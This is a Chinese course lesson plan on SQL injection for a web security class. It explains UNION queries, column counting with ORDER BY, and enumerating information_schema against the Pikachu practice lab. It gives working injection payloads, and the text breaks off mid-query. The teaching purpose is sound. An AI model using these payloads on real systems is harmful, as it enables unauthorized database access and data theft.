电子教案 web应用与安全防护-21.docVIP

/学年第学期

教案

课程名称：Web应用安全与防护

课程代码：

任课教师：

教务处印制

课次

21

课程类型

理论

项目（模块）

项目2：典型漏洞利用与防御

----任务2.5SQL注入漏洞（三）

教学目标

知识目标：

1.了解SQL注入漏洞的基本概念、危害，分类

2.理解SQL注入漏洞的测试流程、测试字符串

3.掌握数据库的基本操作

4.掌握手工注入工具注入

5.掌握SQL注入漏洞的利用与加固

能力目标：

1.能利用SQL注入漏洞获取目标靶机数据

情感目标：

1.自主、开放的学习能力

2.良好的自我表现、与人沟通能力

3.良好的团队合作精神

教学重点

union联合查询

information_schema数据库

教学难点

union联合查询

information_schema数据库

教学方法

演示法

教学环境

机房

授课日期

2021/5/17

授课班级

19信息安全与管理

教学过程设计

课前准备

通过QQ群发布授课PPT，视频

教学内容

4.1union操作符

union操作符：用于合并两个或多个select语句的结果集。

在mysql数据库或其他关系型数据库里面都提供了这样的一个方法。

4.2用法举例

selectusername，passwordfromuserwhereid=1unionselect字段1，字段2from表名

注意，union内部的每个select语句必须拥有相同数量的列。

mysqlselectid,usernamefrommemberunionselectpw,email,idfrommemberwhereid=2;

ERROR1222(21000):TheusedSELECTstatementshaveadifferentnumberofcolumns

思考题

当我们用union联合查询的时候，我们并不知道后台的数据库里面查询了几个字段，怎么解决这个问题？

4.3orderby

（1）orderbyn对查询的结果进行排序，按照第n列进行排序，n数字是1-9，字母是a-z。

（2）orderby语句用于根据指定的列对结果集进行排序。如果指定的列不存在，数据库会报错，通过报错判断查询结果的列数，从而确定主查询的字段数。

mysqlselectid,usernamefrommemberorderby2;

mysqlselectid,usernamefrommemberorderby3;

ERROR1054(42S22):Unknowncolumn3inorderclause

获取数据库基础信息

Step1：用orderby猜测获取几列数据

Payload：xx’orderby5#

Step2：获取数据库基础信息

Payload：kobeunionselectdatabase(),user()#

5.1information_schema数据库

在mysql中，自带的information_schema这个表里面存放了大量的重要信息。如果存在注入点的话，可以直接尝试对该数据库进行访问，从而获取更多的信息。

（1）SCHEMATA表：提供了当前mysql实例中所有数据库的信息。showdatabases的结果取自此表。

（2）TABLES表：提供了关于数据库中表的信息（包括视图），详细表述了某个表属于哪个schema，表类型，创建时间等信息。是showtablesfromschmename的结果取自此表。

（3）COLUMNS表：提供了表中的列的信息，详细表述了某张表所有列以及每个列的信息，是Showcolumnsfromschemaname.tablename的结果取自此表。

1.获取表名

mysqlselectid,emailfrommemberwhereusername=kobeunionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema=pikachu’;

Payload：kobeunionselecttable_schema,table_namefrominformation_schema.tableswheretable_schema=pikachu#

2.获取列名

mysqlselectid,emailfrommemberwhereusername=kobeunions